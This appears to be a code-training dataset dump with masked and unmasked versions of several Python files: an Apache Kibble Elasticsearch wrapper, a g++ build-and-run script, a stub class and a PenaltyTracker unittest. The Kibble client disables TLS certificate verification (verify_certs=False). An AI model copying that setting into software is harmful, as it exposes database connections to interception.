return self.ES.get(index=index + '_' + doc_type, doc_type='_doc', id=id
)
def exists(self, index, doc_type, id):
return self.ES.exists(index=index + '_' + doc_type, doc_type='_doc',
id=id)
def delete(self, index, doc_type, id):
return self.ES.delete(index=index + '_' + doc_type, doc_type='_doc',
id=id)
def index(self, index, doc_type, id, body):
return self.ES.index(index=index + '_' + doc_type, doc_type='_doc',
id=id, body=body)
def update(self, index, doc_type, id, body):
return self.ES.update(index=index + '_' + doc_type, doc_type='_doc',
id=id, body=body)
def scroll(self, scroll_id, scroll):
return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)
def delete_by_query(self, **kwargs):
return self.ES.delete_by_query(**kwargs)
def search(self, index, doc_type, size=100, scroll=None,
_source_include=None, body=None):
return self.ES.search(index=index + '_' + doc_type, doc_type='_doc',
size=size, scroll=scroll, _source_include=_source_include, body
=body)
def count(self, index, doc_type='*', body=None):
return self.ES.count(index=index + '_' + doc_type, doc_type='_doc',
body=body)
class KibbleESWrapperSeven(object):
"""
Class for rewriting old-style queries to the >= 7.x ones,
where doc_type is an integral part of the DB name and NO DOC_TYPE!
"""
def __init__(self, ES):
self.ES = ES
def get(self, index, doc_type, id):
return self.ES.get(index=index + '_' + doc_type, id=id)
def exists(self, index, doc_type, id):
return self.ES.exists(index=index + '_' + doc_type, id=id)
def delete(self, index, doc_type, id):
return self.ES.delete(index=index + '_' + doc_type, id=id)
def index(self, index, doc_type, id, body):
return self.ES.index(index=index + '_' + doc_type, id=id, body=body)
def update(self, index, doc_type, id, body):
return self.ES.update(index=index + '_' + doc_type, id=id, body=body)
def scroll(self, scroll_id, scroll):
return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)
def delete_by_query(self, **kwargs):
return self.ES.delete_by_query(**kwargs)
def search(self, index, doc_type, size=100, scroll=None,
_source_include=None, body=None):
return self.ES.search(index=index + '_' + doc_type, size=size,
scroll=scroll, _source_includes=_source_include, body=body)
def count(self, index, doc_type='*', body=None):
return self.ES.count(index=index + '_' + doc_type, body=body)
class KibbleDatabase(object):
def __init__(self, config: KibbleConfigParser):
self.config = config
self.dbname = config.get('elasticsearch', 'dbname')
self.ES = elasticsearch.Elasticsearch([config.get('elasticsearch',
'conn_uri')], use_ssl=config.getboolean('elasticsearch', 'ssl'),
verify_certs=False, max_retries=5, retry_on_timeout=True)
self.ESversion = int(self.ES.info()['version']['number'].split('.')[0])
if self.ESversion >= 7:
self.ES = KibbleESWrapperSeven(self.ES)
elif self.ESversion >= 6:
self.ES = KibbleESWrapper(self.ES)
<|reserved_special_token_1|>
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
This is the ES library for Apache Kibble.
It stores the elasticsearch handler and config options.
"""
import elasticsearch
from kibble.configuration import KibbleConfigParser
class KibbleESWrapper(object):
"""
Class for rewriting old-style queries to the new ones,
where doc_type is an integral part of the DB name
"""
def __init__(self, ES):
self.ES = ES
def get(self, index, doc_type, id):
return self.ES.get(index=index + "_" + doc_type, doc_type="_doc", id=id)
def exists(self, index, doc_type, id):
return self.ES.exists(index=index + "_" + doc_type, doc_type="_doc", id=id)
def delete(self, index, doc_type, id):
return self.ES.delete(index=index + "_" + doc_type, doc_type="_doc", id=id)
def index(self, index, doc_type, id, body):
return self.ES.index(
index=index + "_" + doc_type, doc_type="_doc", id=id, body=body
)
def update(self, index, doc_type, id, body):
return self.ES.update(
index=index + "_" + doc_type, doc_type="_doc", id=id, body=body
)
def scroll(self, scroll_id, scroll):
return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)
def delete_by_query(self, **kwargs):
return self.ES.delete_by_query(**kwargs)
def search(
self, index, doc_type, size=100, scroll=None, _source_include=None, body=None
):
return self.ES.search(
index=index + "_" + doc_type,
doc_type="_doc",
size=size,
scroll=scroll,
_source_include=_source_include,
body=body,
)
def count(self, index, doc_type="*", body=None):
return self.ES.count(index=index + "_" + doc_type, doc_type="_doc", body=body)
class KibbleESWrapperSeven(object):
"""
Class for rewriting old-style queries to the >= 7.x ones,
where doc_type is an integral part of the DB name and NO DOC_TYPE!
"""
def __init__(self, ES):
self.ES = ES
def get(self, index, doc_type, id):
return self.ES.get(index=index + "_" + doc_type, id=id)
def exists(self, index, doc_type, id):
return self.ES.exists(index=index + "_" + doc_type, id=id)
def delete(self, index, doc_type, id):
return self.ES.delete(index=index + "_" + doc_type, id=id)
def index(self, index, doc_type, id, body):
return self.ES.index(index=index + "_" + doc_type, id=id, body=body)
def update(self, index, doc_type, id, body):
return self.ES.update(index=index + "_" + doc_type, id=id, body=body)
def scroll(self, scroll_id, scroll):
return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)
def delete_by_query(self, **kwargs):
return self.ES.delete_by_query(**kwargs)
def search(
self, index, doc_type, size=100, scroll=None, _source_include=None, body=None
):
return self.ES.search(
index=index + "_" + doc_type,
size=size,
scroll=scroll,
_source_includes=_source_include,
body=body,
)
def count(self, index, doc_type="*", body=None):
return self.ES.count(index=index + "_" + doc_type, body=body)
class KibbleDatabase(object):
def __init__(self, config: KibbleConfigParser):
self.config = config
self.dbname = config.get("elasticsearch", "dbname")
self.ES = elasticsearch.Elasticsearch(
[config.get("elasticsearch", "conn_uri")],
use_ssl=config.getboolean("elasticsearch", "ssl"),
verify_certs=False,
max_retries=5,
retry_on_timeout=True,
)
# IMPORTANT BIT: Figure out if this is ES < 6.x, 6.x or >= 7.x.
# If so, we're using the new ES DB mappings, and need to adjust ALL
# ES calls to match this.
self.ESversion = int(self.ES.info()["version"]["number"].split(".")[0])
if self.ESversion >= 7:
self.ES = KibbleESWrapperSeven(self.ES)
elif self.ESversion >= 6:
self.ES = KibbleESWrapper(self.ES)
|
flexible
|
{
"blob_id": "f4b704a1416bfd6524340a68a20981957abf4340",
"index": 9850,
"step-1": "<mask token>\n\n\nclass KibbleESWrapper(object):\n <mask token>\n\n def __init__(self, ES):\n self.ES = ES\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def scroll(self, scroll_id, scroll):\n return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)\n <mask token>\n <mask token>\n <mask token>\n\n\nclass KibbleESWrapperSeven(object):\n \"\"\"\n Class for rewriting old-style queries to the >= 7.x ones,\n where doc_type is an integral part of the DB name and NO DOC_TYPE!\n \"\"\"\n\n def __init__(self, ES):\n self.ES = ES\n\n def get(self, index, doc_type, id):\n return self.ES.get(index=index + '_' + doc_type, id=id)\n\n def exists(self, index, doc_type, id):\n return self.ES.exists(index=index + '_' + doc_type, id=id)\n\n def delete(self, index, doc_type, id):\n return self.ES.delete(index=index + '_' + doc_type, id=id)\n\n def index(self, index, doc_type, id, body):\n return self.ES.index(index=index + '_' + doc_type, id=id, body=body)\n\n def update(self, index, doc_type, id, body):\n return self.ES.update(index=index + '_' + doc_type, id=id, body=body)\n\n def scroll(self, scroll_id, scroll):\n return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)\n\n def delete_by_query(self, **kwargs):\n return self.ES.delete_by_query(**kwargs)\n\n def search(self, index, doc_type, size=100, scroll=None,\n _source_include=None, body=None):\n return self.ES.search(index=index + '_' + doc_type, size=size,\n scroll=scroll, _source_includes=_source_include, body=body)\n\n def count(self, index, doc_type='*', body=None):\n return self.ES.count(index=index + '_' + doc_type, body=body)\n\n\nclass KibbleDatabase(object):\n\n def __init__(self, config: KibbleConfigParser):\n self.config = config\n self.dbname = config.get('elasticsearch', 'dbname')\n self.ES = elasticsearch.Elasticsearch([config.get('elasticsearch',\n 'conn_uri')], use_ssl=config.getboolean('elasticsearch', 'ssl'),\n verify_certs=False, max_retries=5, retry_on_timeout=True)\n self.ESversion = int(self.ES.info()['version']['number'].split('.')[0])\n if self.ESversion >= 7:\n self.ES = KibbleESWrapperSeven(self.ES)\n elif self.ESversion >= 6:\n self.ES = KibbleESWrapper(self.ES)\n",
"step-2": "<mask token>\n\n\nclass KibbleESWrapper(object):\n <mask token>\n\n def __init__(self, ES):\n self.ES = ES\n <mask token>\n <mask token>\n <mask token>\n\n def index(self, index, doc_type, id, body):\n return self.ES.index(index=index + '_' + doc_type, doc_type='_doc',\n id=id, body=body)\n <mask token>\n\n def scroll(self, scroll_id, scroll):\n return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)\n <mask token>\n <mask token>\n\n def count(self, index, doc_type='*', body=None):\n return self.ES.count(index=index + '_' + doc_type, doc_type='_doc',\n body=body)\n\n\nclass KibbleESWrapperSeven(object):\n \"\"\"\n Class for rewriting old-style queries to the >= 7.x ones,\n where doc_type is an integral part of the DB name and NO DOC_TYPE!\n \"\"\"\n\n def __init__(self, ES):\n self.ES = ES\n\n def get(self, index, doc_type, id):\n return self.ES.get(index=index + '_' + doc_type, id=id)\n\n def exists(self, index, doc_type, id):\n return self.ES.exists(index=index + '_' + doc_type, id=id)\n\n def delete(self, index, doc_type, id):\n return self.ES.delete(index=index + '_' + doc_type, id=id)\n\n def index(self, index, doc_type, id, body):\n return self.ES.index(index=index + '_' + doc_type, id=id, body=body)\n\n def update(self, index, doc_type, id, body):\n return self.ES.update(index=index + '_' + doc_type, id=id, body=body)\n\n def scroll(self, scroll_id, scroll):\n return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)\n\n def delete_by_query(self, **kwargs):\n return self.ES.delete_by_query(**kwargs)\n\n def search(self, index, doc_type, size=100, scroll=None,\n _source_include=None, body=None):\n return self.ES.search(index=index + '_' + doc_type, size=size,\n scroll=scroll, _source_includes=_source_include, body=body)\n\n def count(self, index, doc_type='*', body=None):\n return self.ES.count(index=index + '_' + doc_type, body=body)\n\n\nclass KibbleDatabase(object):\n\n def __init__(self, config: KibbleConfigParser):\n self.config = config\n self.dbname = config.get('elasticsearch', 'dbname')\n self.ES = elasticsearch.Elasticsearch([config.get('elasticsearch',\n 'conn_uri')], use_ssl=config.getboolean('elasticsearch', 'ssl'),\n verify_certs=False, max_retries=5, retry_on_timeout=True)\n self.ESversion = int(self.ES.info()['version']['number'].split('.')[0])\n if self.ESversion >= 7:\n self.ES = KibbleESWrapperSeven(self.ES)\n elif self.ESversion >= 6:\n self.ES = KibbleESWrapper(self.ES)\n",
"step-3": "<mask token>\n\n\nclass KibbleESWrapper(object):\n <mask token>\n\n def __init__(self, ES):\n self.ES = ES\n\n def get(self, index, doc_type, id):\n return self.ES.get(index=index + '_' + doc_type, doc_type='_doc', id=id\n )\n\n def exists(self, index, doc_type, id):\n return self.ES.exists(index=index + '_' + doc_type, doc_type='_doc',\n id=id)\n <mask token>\n\n def index(self, index, doc_type, id, body):\n return self.ES.index(index=index + '_' + doc_type, doc_type='_doc',\n id=id, body=body)\n\n def update(self, index, doc_type, id, body):\n return self.ES.update(index=index + '_' + doc_type, doc_type='_doc',\n id=id, body=body)\n\n def scroll(self, scroll_id, scroll):\n return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)\n <mask token>\n\n def search(self, index, doc_type, size=100, scroll=None,\n _source_include=None, body=None):\n return self.ES.search(index=index + '_' + doc_type, doc_type='_doc',\n size=size, scroll=scroll, _source_include=_source_include, body\n =body)\n\n def count(self, index, doc_type='*', body=None):\n return self.ES.count(index=index + '_' + doc_type, doc_type='_doc',\n body=body)\n\n\nclass KibbleESWrapperSeven(object):\n \"\"\"\n Class for rewriting old-style queries to the >= 7.x ones,\n where doc_type is an integral part of the DB name and NO DOC_TYPE!\n \"\"\"\n\n def __init__(self, ES):\n self.ES = ES\n\n def get(self, index, doc_type, id):\n return self.ES.get(index=index + '_' + doc_type, id=id)\n\n def exists(self, index, doc_type, id):\n return self.ES.exists(index=index + '_' + doc_type, id=id)\n\n def delete(self, index, doc_type, id):\n return self.ES.delete(index=index + '_' + doc_type, id=id)\n\n def index(self, index, doc_type, id, body):\n return self.ES.index(index=index + '_' + doc_type, id=id, body=body)\n\n def update(self, index, doc_type, id, body):\n return self.ES.update(index=index + '_' + doc_type, id=id, body=body)\n\n def scroll(self, scroll_id, scroll):\n return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)\n\n def delete_by_query(self, **kwargs):\n return self.ES.delete_by_query(**kwargs)\n\n def search(self, index, doc_type, size=100, scroll=None,\n _source_include=None, body=None):\n return self.ES.search(index=index + '_' + doc_type, size=size,\n scroll=scroll, _source_includes=_source_include, body=body)\n\n def count(self, index, doc_type='*', body=None):\n return self.ES.count(index=index + '_' + doc_type, body=body)\n\n\nclass KibbleDatabase(object):\n\n def __init__(self, config: KibbleConfigParser):\n self.config = config\n self.dbname = config.get('elasticsearch', 'dbname')\n self.ES = elasticsearch.Elasticsearch([config.get('elasticsearch',\n 'conn_uri')], use_ssl=config.getboolean('elasticsearch', 'ssl'),\n verify_certs=False, max_retries=5, retry_on_timeout=True)\n self.ESversion = int(self.ES.info()['version']['number'].split('.')[0])\n if self.ESversion >= 7:\n self.ES = KibbleESWrapperSeven(self.ES)\n elif self.ESversion >= 6:\n self.ES = KibbleESWrapper(self.ES)\n",
"step-4": "<mask token>\n\n\nclass KibbleESWrapper(object):\n <mask token>\n\n def __init__(self, ES):\n self.ES = ES\n\n def get(self, index, doc_type, id):\n return self.ES.get(index=index + '_' + doc_type, doc_type='_doc', id=id\n )\n\n def exists(self, index, doc_type, id):\n return self.ES.exists(index=index + '_' + doc_type, doc_type='_doc',\n id=id)\n\n def delete(self, index, doc_type, id):\n return self.ES.delete(index=index + '_' + doc_type, doc_type='_doc',\n id=id)\n\n def index(self, index, doc_type, id, body):\n return self.ES.index(index=index + '_' + doc_type, doc_type='_doc',\n id=id, body=body)\n\n def update(self, index, doc_type, id, body):\n return self.ES.update(index=index + '_' + doc_type, doc_type='_doc',\n id=id, body=body)\n\n def scroll(self, scroll_id, scroll):\n return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)\n\n def delete_by_query(self, **kwargs):\n return self.ES.delete_by_query(**kwargs)\n\n def search(self, index, doc_type, size=100, scroll=None,\n _source_include=None, body=None):\n return self.ES.search(index=index + '_' + doc_type, doc_type='_doc',\n size=size, scroll=scroll, _source_include=_source_include, body\n =body)\n\n def count(self, index, doc_type='*', body=None):\n return self.ES.count(index=index + '_' + doc_type, doc_type='_doc',\n body=body)\n\n\nclass KibbleESWrapperSeven(object):\n \"\"\"\n Class for rewriting old-style queries to the >= 7.x ones,\n where doc_type is an integral part of the DB name and NO DOC_TYPE!\n \"\"\"\n\n def __init__(self, ES):\n self.ES = ES\n\n def get(self, index, doc_type, id):\n return self.ES.get(index=index + '_' + doc_type, id=id)\n\n def exists(self, index, doc_type, id):\n return self.ES.exists(index=index + '_' + doc_type, id=id)\n\n def delete(self, index, doc_type, id):\n return self.ES.delete(index=index + '_' + doc_type, id=id)\n\n def index(self, index, doc_type, id, body):\n return self.ES.index(index=index + '_' + doc_type, id=id, body=body)\n\n def update(self, index, doc_type, id, body):\n return self.ES.update(index=index + '_' + doc_type, id=id, body=body)\n\n def scroll(self, scroll_id, scroll):\n return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)\n\n def delete_by_query(self, **kwargs):\n return self.ES.delete_by_query(**kwargs)\n\n def search(self, index, doc_type, size=100, scroll=None,\n _source_include=None, body=None):\n return self.ES.search(index=index + '_' + doc_type, size=size,\n scroll=scroll, _source_includes=_source_include, body=body)\n\n def count(self, index, doc_type='*', body=None):\n return self.ES.count(index=index + '_' + doc_type, body=body)\n\n\nclass KibbleDatabase(object):\n\n def __init__(self, config: KibbleConfigParser):\n self.config = config\n self.dbname = config.get('elasticsearch', 'dbname')\n self.ES = elasticsearch.Elasticsearch([config.get('elasticsearch',\n 'conn_uri')], use_ssl=config.getboolean('elasticsearch', 'ssl'),\n verify_certs=False, max_retries=5, retry_on_timeout=True)\n self.ESversion = int(self.ES.info()['version']['number'].split('.')[0])\n if self.ESversion >= 7:\n self.ES = KibbleESWrapperSeven(self.ES)\n elif self.ESversion >= 6:\n self.ES = KibbleESWrapper(self.ES)\n",
"step-5": "# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nThis is the ES library for Apache Kibble.\nIt stores the elasticsearch handler and config options.\n\"\"\"\n\nimport elasticsearch\n\nfrom kibble.configuration import KibbleConfigParser\n\n\nclass KibbleESWrapper(object):\n \"\"\"\n Class for rewriting old-style queries to the new ones,\n where doc_type is an integral part of the DB name\n \"\"\"\n\n def __init__(self, ES):\n self.ES = ES\n\n def get(self, index, doc_type, id):\n return self.ES.get(index=index + \"_\" + doc_type, doc_type=\"_doc\", id=id)\n\n def exists(self, index, doc_type, id):\n return self.ES.exists(index=index + \"_\" + doc_type, doc_type=\"_doc\", id=id)\n\n def delete(self, index, doc_type, id):\n return self.ES.delete(index=index + \"_\" + doc_type, doc_type=\"_doc\", id=id)\n\n def index(self, index, doc_type, id, body):\n return self.ES.index(\n index=index + \"_\" + doc_type, doc_type=\"_doc\", id=id, body=body\n )\n\n def update(self, index, doc_type, id, body):\n return self.ES.update(\n index=index + \"_\" + doc_type, doc_type=\"_doc\", id=id, body=body\n )\n\n def scroll(self, scroll_id, scroll):\n return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)\n\n def delete_by_query(self, **kwargs):\n return self.ES.delete_by_query(**kwargs)\n\n def search(\n self, index, doc_type, size=100, scroll=None, _source_include=None, body=None\n ):\n return self.ES.search(\n index=index + \"_\" + doc_type,\n doc_type=\"_doc\",\n size=size,\n scroll=scroll,\n _source_include=_source_include,\n body=body,\n )\n\n def count(self, index, doc_type=\"*\", body=None):\n return self.ES.count(index=index + \"_\" + doc_type, doc_type=\"_doc\", body=body)\n\n\nclass KibbleESWrapperSeven(object):\n \"\"\"\n Class for rewriting old-style queries to the >= 7.x ones,\n where doc_type is an integral part of the DB name and NO DOC_TYPE!\n \"\"\"\n\n def __init__(self, ES):\n self.ES = ES\n\n def get(self, index, doc_type, id):\n return self.ES.get(index=index + \"_\" + doc_type, id=id)\n\n def exists(self, index, doc_type, id):\n return self.ES.exists(index=index + \"_\" + doc_type, id=id)\n\n def delete(self, index, doc_type, id):\n return self.ES.delete(index=index + \"_\" + doc_type, id=id)\n\n def index(self, index, doc_type, id, body):\n return self.ES.index(index=index + \"_\" + doc_type, id=id, body=body)\n\n def update(self, index, doc_type, id, body):\n return self.ES.update(index=index + \"_\" + doc_type, id=id, body=body)\n\n def scroll(self, scroll_id, scroll):\n return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)\n\n def delete_by_query(self, **kwargs):\n return self.ES.delete_by_query(**kwargs)\n\n def search(\n self, index, doc_type, size=100, scroll=None, _source_include=None, body=None\n ):\n return self.ES.search(\n index=index + \"_\" + doc_type,\n size=size,\n scroll=scroll,\n _source_includes=_source_include,\n body=body,\n )\n\n def count(self, index, doc_type=\"*\", body=None):\n return self.ES.count(index=index + \"_\" + doc_type, body=body)\n\n\nclass KibbleDatabase(object):\n def __init__(self, config: KibbleConfigParser):\n self.config = config\n self.dbname = config.get(\"elasticsearch\", \"dbname\")\n self.ES = elasticsearch.Elasticsearch(\n [config.get(\"elasticsearch\", \"conn_uri\")],\n use_ssl=config.getboolean(\"elasticsearch\", \"ssl\"),\n verify_certs=False,\n max_retries=5,\n retry_on_timeout=True,\n )\n\n # IMPORTANT BIT: Figure out if this is ES < 6.x, 6.x or >= 7.x.\n # If so, we're using the new ES DB mappings, and need to adjust ALL\n # ES calls to match this.\n self.ESversion = int(self.ES.info()[\"version\"][\"number\"].split(\".\")[0])\n if self.ESversion >= 7:\n self.ES = KibbleESWrapperSeven(self.ES)\n elif self.ESversion >= 6:\n self.ES = KibbleESWrapper(self.ES)\n",
"step-ids": [
17,
19,
23,
25,
28
]
}
|
[
17,
19,
23,
25,
28
] |
#!/usr/bin/python3
import os
import sys
import subprocess
path = sys.argv[1]
name, ext = os.path.splitext(path)
options = ['g++',
'-O3',
'src/' + path,
'-o', f'./bin/{name}',
'-std=c++11',
'-lgmp']
subprocess.call(options)
subprocess.call([f'./bin/{name}'])
|
normal
|
{
"blob_id": "5dd79f8ebd74099871d4367cafd83359c4f24e26",
"index": 5385,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsubprocess.call(options)\nsubprocess.call([f'./bin/{name}'])\n",
"step-3": "<mask token>\npath = sys.argv[1]\nname, ext = os.path.splitext(path)\noptions = ['g++', '-O3', 'src/' + path, '-o', f'./bin/{name}', '-std=c++11',\n '-lgmp']\nsubprocess.call(options)\nsubprocess.call([f'./bin/{name}'])\n",
"step-4": "import os\nimport sys\nimport subprocess\npath = sys.argv[1]\nname, ext = os.path.splitext(path)\noptions = ['g++', '-O3', 'src/' + path, '-o', f'./bin/{name}', '-std=c++11',\n '-lgmp']\nsubprocess.call(options)\nsubprocess.call([f'./bin/{name}'])\n",
"step-5": "#!/usr/bin/python3\n\nimport os\nimport sys\nimport subprocess\n\npath = sys.argv[1]\nname, ext = os.path.splitext(path)\noptions = ['g++',\n '-O3',\n 'src/' + path,\n '-o', f'./bin/{name}',\n '-std=c++11',\n '-lgmp']\nsubprocess.call(options)\nsubprocess.call([f'./bin/{name}'])\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Office(Room):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Office(Room):
def __init__(self):
pass
<|reserved_special_token_1|>
from room import Room
class Office(Room):
def __init__(self):
pass
|
flexible
|
{
"blob_id": "d3af5ac87474a99f1ade222995884bc8e035ce35",
"index": 6142,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Office(Room):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Office(Room):\n\n def __init__(self):\n pass\n",
"step-4": "from room import Room\n\n\nclass Office(Room):\n\n def __init__(self):\n pass\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class TestingPenaltyTracker(unittest.TestCase):
<|reserved_special_token_0|>
@classmethod
def tearDownClass(cls):
cls.testPenaltyTracker = None
cls.controlDatabase = None
os.remove(os.path.join(os.getcwd(), 'Tests', 'test_penalty.db'))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def testPenaltyProcessing(self):
self.testPenaltyTracker.setTargetDate('2016-10-24')
self.testPenaltyTracker.run()
self.assertEqual(self.controlDatabase.getHighestID(), self.
testPenaltyTracker.databaseManager.getHighestID())
getAllCommand = 'SELECT * FROM PenaltyTracker'
controlRows = self.controlDatabase.getData(getAllCommand)
testRows = self.testPenaltyTracker.databaseManager.getData(
getAllCommand)
self.assertEqual(controlRows, testRows)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestingPenaltyTracker(unittest.TestCase):
<|reserved_special_token_0|>
@classmethod
def tearDownClass(cls):
cls.testPenaltyTracker = None
cls.controlDatabase = None
os.remove(os.path.join(os.getcwd(), 'Tests', 'test_penalty.db'))
def testGameUrls(self):
self.testPenaltyTracker.setTargetDate('2016-02-26')
numberOfGames = len(self.testPenaltyTracker.GetGameURLS())
self.assertEqual(numberOfGames, 5)
def testSetDBLocation(self):
self.assertNotEqual(self.testPenaltyTracker.databaseManager, None)
def testPenaltyProcessing(self):
self.testPenaltyTracker.setTargetDate('2016-10-24')
self.testPenaltyTracker.run()
self.assertEqual(self.controlDatabase.getHighestID(), self.
testPenaltyTracker.databaseManager.getHighestID())
getAllCommand = 'SELECT * FROM PenaltyTracker'
controlRows = self.controlDatabase.getData(getAllCommand)
testRows = self.testPenaltyTracker.databaseManager.getData(
getAllCommand)
self.assertEqual(controlRows, testRows)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestingPenaltyTracker(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.testPTDatabase = os.path.join(os.getcwd(), 'Tests',
'test_penalty.db')
cls.testPenaltyTracker = PenaltyTracker()
cls.testPenaltyTracker.setDatabaseLocation(cls.testPTDatabase)
cls.testPenaltyTracker.setSeason('PenaltyTracker')
cls.testPenaltyTracker.createAndSetDatabaseManager()
controlPath = os.path.join(os.getcwd(), 'Tests',
'season_test_10-24-16.db')
cls.controlDatabase = DatabaseManager(controlPath, 'PenaltyTracker')
@classmethod
def tearDownClass(cls):
cls.testPenaltyTracker = None
cls.controlDatabase = None
os.remove(os.path.join(os.getcwd(), 'Tests', 'test_penalty.db'))
def testGameUrls(self):
self.testPenaltyTracker.setTargetDate('2016-02-26')
numberOfGames = len(self.testPenaltyTracker.GetGameURLS())
self.assertEqual(numberOfGames, 5)
def testSetDBLocation(self):
self.assertNotEqual(self.testPenaltyTracker.databaseManager, None)
def testPenaltyProcessing(self):
self.testPenaltyTracker.setTargetDate('2016-10-24')
self.testPenaltyTracker.run()
self.assertEqual(self.controlDatabase.getHighestID(), self.
testPenaltyTracker.databaseManager.getHighestID())
getAllCommand = 'SELECT * FROM PenaltyTracker'
controlRows = self.controlDatabase.getData(getAllCommand)
testRows = self.testPenaltyTracker.databaseManager.getData(
getAllCommand)
self.assertEqual(controlRows, testRows)
<|reserved_special_token_1|>
from PenaltyTracker import PenaltyTracker
from DatabaseManager import DatabaseManager
import unittest, os, sys, shutil, filecmp
class TestingPenaltyTracker(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.testPTDatabase = os.path.join(os.getcwd(), 'Tests',
'test_penalty.db')
cls.testPenaltyTracker = PenaltyTracker()
cls.testPenaltyTracker.setDatabaseLocation(cls.testPTDatabase)
cls.testPenaltyTracker.setSeason('PenaltyTracker')
cls.testPenaltyTracker.createAndSetDatabaseManager()
controlPath = os.path.join(os.getcwd(), 'Tests',
'season_test_10-24-16.db')
cls.controlDatabase = DatabaseManager(controlPath, 'PenaltyTracker')
@classmethod
def tearDownClass(cls):
cls.testPenaltyTracker = None
cls.controlDatabase = None
os.remove(os.path.join(os.getcwd(), 'Tests', 'test_penalty.db'))
def testGameUrls(self):
self.testPenaltyTracker.setTargetDate('2016-02-26')
numberOfGames = len(self.testPenaltyTracker.GetGameURLS())
self.assertEqual(numberOfGames, 5)
def testSetDBLocation(self):
self.assertNotEqual(self.testPenaltyTracker.databaseManager, None)
def testPenaltyProcessing(self):
self.testPenaltyTracker.setTargetDate('2016-10-24')
self.testPenaltyTracker.run()
self.assertEqual(self.controlDatabase.getHighestID(), self.
testPenaltyTracker.databaseManager.getHighestID())
getAllCommand = 'SELECT * FROM PenaltyTracker'
controlRows = self.controlDatabase.getData(getAllCommand)
testRows = self.testPenaltyTracker.databaseManager.getData(
getAllCommand)
self.assertEqual(controlRows, testRows)
<|reserved_special_token_1|>
from PenaltyTracker import PenaltyTracker
from DatabaseManager import DatabaseManager
import unittest,os,sys,shutil, filecmp
class TestingPenaltyTracker(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.testPTDatabase = os.path.join( os.getcwd(), "Tests", "test_penalty.db")
cls.testPenaltyTracker = PenaltyTracker()
cls.testPenaltyTracker.setDatabaseLocation(cls.testPTDatabase)
cls.testPenaltyTracker.setSeason("PenaltyTracker")
cls.testPenaltyTracker.createAndSetDatabaseManager()
controlPath = os.path.join(os.getcwd(), "Tests", "season_test_10-24-16.db")
cls.controlDatabase = DatabaseManager(controlPath, "PenaltyTracker")
@classmethod
def tearDownClass(cls):
cls.testPenaltyTracker = None
cls.controlDatabase = None
os.remove( os.path.join( os.getcwd(), "Tests", "test_penalty.db") )
def testGameUrls(self):
self.testPenaltyTracker.setTargetDate("2016-02-26")
numberOfGames = len( self.testPenaltyTracker.GetGameURLS() )
self.assertEqual( numberOfGames, 5 )
def testSetDBLocation(self):
self.assertNotEqual(self.testPenaltyTracker.databaseManager, None )
def testPenaltyProcessing(self):
# generate the test data
self.testPenaltyTracker.setTargetDate("2016-10-24")
self.testPenaltyTracker.run();
self.assertEqual( self.controlDatabase.getHighestID(), self.testPenaltyTracker.databaseManager.getHighestID() )
getAllCommand = "SELECT * FROM PenaltyTracker"
controlRows = self.controlDatabase.getData(getAllCommand)
testRows = self.testPenaltyTracker.databaseManager.getData(getAllCommand)
self.assertEqual(controlRows, testRows)
|
flexible
|
{
"blob_id": "607d8bc79caa9d767bdb7e77a5db52295d90236f",
"index": 1759,
